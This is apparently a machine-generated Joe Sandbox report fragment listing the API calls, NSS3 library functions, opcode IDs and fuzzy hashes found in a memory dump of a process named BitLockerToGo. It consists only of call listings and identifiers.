                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: TlsGetValue.KERNEL32 ref: 6C68C494
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C68C4A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: PR_Unlock.NSS3(?), ref: 6C68C4F4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                                                                                                                          • String ID: <+kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2538134263-1840033307
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e4e7be6cb94a4fcf49dc4d1962f5f8916a4648cf9ec3dd1384227c547ebf6298
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A411E7B6B00104ABDB008E65EC00A9B77D99F85768F194134E91CD7780EB72ED16C7A9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C70CC7B), ref: 6C70CD7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CD8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CDA5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CDB8
                                                                                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C70CCB5
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A14F4,6C7A02AC,00000090), ref: 6C70CCD3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A1588,6C7A02AC,00000090), ref: 6C70CD2B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C629AC0: socket.WSOCK32(?,00000017,6C6299BE), ref: 6C629AE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C629AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6299BE), ref: 6C629AFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630590: closesocket.WSOCK32(6C629A8F,?,?,6C629A8F,00000000), ref: 6C630597
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aaab91330bc38aa688a545e79bdc09da78331a4cc029f2c97f6d7df53b333666
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 591d9e4b449046203685ca7afd8fa6ccfbd165cf55aef4e71bd5df238b1c5bd9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaab91330bc38aa688a545e79bdc09da78331a4cc029f2c97f6d7df53b333666
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C81166F6B00250DFFB009FE9EA0B74A3AB89346658F541539E516CBB81EB71C4148BE6
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C71C3A2,?,?,00000000,00000000), ref: 6C6FA528
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FA6E0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CA94F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5CA948
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C5CA943
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5CA939
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2377b9926364a879b799a87d0c8007e559379ab19bbb8d3a9d9b0ab73587e3ff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d14ba754816ee326cdeb5063c92fef9cbe44cc32b5dfbb07bc6e54ebde161f4a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2377b9926364a879b799a87d0c8007e559379ab19bbb8d3a9d9b0ab73587e3ff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A014931B002089BC710CBB9DD06B5BB7F5AF85308F45493DE95957A80E731AD0987A2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C660715), ref: 6C658859
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C658874
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C65888D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cf2558c2922c2869a36a2e06ef02f5ee14c3e11409034bb6dd0f85cbc0410aff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75031e315126647e1bd7e0ab0d514417ac5f52cc8057c02d3221cad9d576f104
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2558c2922c2869a36a2e06ef02f5ee14c3e11409034bb6dd0f85cbc0410aff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0F6A2E8162027F2101169AC0AB877588AF5675EF540031E90CA3FC2EB51D52983FE
APIs
• PK11_FreeSymKey.NSS3(?,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8A3
  • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
  • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
  • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
  • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
  • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
  • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
  • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
• PK11_FreeSymKey.NSS3(?,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8BA
• SECITEM_ZfreeItem_Util.NSS3(%_ml,00000000,00000000,?,6C6D5F25,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EA8CF
Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
• String ID: %_ml
• API String ID: 2877228265-1159713028
• Opcode ID: 86852a99c7d6a6408d9d7c267d929606fed28a90d2d864f00e18e9caba50a56a
• Instruction ID: e451e01948f30bd51c685d03492bebf533d482cfb0c39c9ec42fcc1625e3dd7e
• Opcode Fuzzy Hash: 86852a99c7d6a6408d9d7c267d929606fed28a90d2d864f00e18e9caba50a56a
• Instruction Fuzzy Hash: 79F0E5B2E0271497EA109A15EC00B9377ECAB0175DF448475EC1A97B42E335F8058BED
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6C6B1D8F
  • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
  • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
  • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6B1DA6
  • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
  • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
  • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
  • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
  • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
• SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6B1E13
• PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6B1ED0
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
• String ID:
• API String ID: 84796498-0
• Opcode ID: 4b8b7aca68116e79cf1b7b6666a4e420f10c71f335856417a6287d2f9c4e24b5
• Instruction ID: ae7dff3adbdeaa08b741d6ad32e5a3c6dcabfea5ec194d96af997eaad351c190
• Opcode Fuzzy Hash: 4b8b7aca68116e79cf1b7b6666a4e420f10c71f335856417a6287d2f9c4e24b5
• Instruction Fuzzy Hash: 19516875A00309EFDB10CF98D884BAEBBB6FF49308F144129E819AB750D731E956CB94
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5E85D2,00000000,?,?), ref: 6C704FFD
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C70500C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7050C8
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7050D6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b0743f4a20ad076e12419e2af18cd5f62591208a63bcc583edaaa9c1b603fb2e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741A3B2A402158FCB18CF28DCD179AB7E1BF4431871D466DC84ACBB02E779E891CB95
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C75A662), ref: 6C75A69E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75A690: PR_NewCondVar.NSS3(?), ref: 6C75A6B4
                                                                                                                                                                                                                                                                                                                                                          • PR_IntervalNow.NSS3 ref: 6C75A8C6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75A8EB
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75A944
                                                                                                                                                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C75A94F
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 811965633-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cb23450aa82c6d19fa0eda16e80346a6c9d068484a69006648dabf38a493619
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 74fc7264efa8766925ff6221d6549dd26077fc4951d891af5fd869ec1a7a5fc0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb23450aa82c6d19fa0eda16e80346a6c9d068484a69006648dabf38a493619
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B414BB4A01A129FC704CF29C684966FBF5FF48328755857AD449CBB11EB31F860CBA0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717E10
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717EA6
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717EB5
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C717ED8
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 962d0269040d11f4d372fe1d00472ea429b3befefee6a46b1316a94cc54ed057
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF31C4B1A001158FDB04CF08CD9489ABBE6BF8831871E8179D8085BB11EB75EC55CBD1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C646C8D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C646CA9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C646CC0
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C768FE0), ref: 6C646CFE
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: adcb596f18e38229688b341bc5f982d12fb90266e0bcd1eefa8ef2918c891dee
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bd0cf3831730787afaf48cbb72eff160ce61cfd7c18bbc91f60ff7eeab203fb4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adcb596f18e38229688b341bc5f982d12fb90266e0bcd1eefa8ef2918c891dee
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86318EB5A002169FEB08DF65C891ABFBBF5EF45348B10842DD905E7700EB71D905CBA4
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C754F5D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754F74
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754F82
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C754F90
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 17951984-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e88853ad05051a3cc286083f36f824d333c84ce706f35bef313091539a2e5e42
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e6eea615a2048b141a90a4139a3b9e1491e07dc11eb258bfb5173d028e78fe0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e88853ad05051a3cc286083f36f824d333c84ce706f35bef313091539a2e5e42
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F315775A002094BEF00CF6CDD85BDFB3B8FF45348F480238E815A7280DB35A92586A1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DDF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DE0B
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DE17
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C69DE80
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3725328900-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 98d918662ae8dbffb4a157e11fc3280ef9ad321082edac89f2376adb2b2adf13
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3531B4B5901B439BE700CF5AD880692F7E4FFA5318B24823AD81D87B41EB71F5A5CB94
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6B2896
                                                                                                                                                                                                                                                                                                                                                          • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6B2932
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6B294C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6B2955
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 508480814-0
                                                                                                                                                                                                                                                                                                                                                          APIs
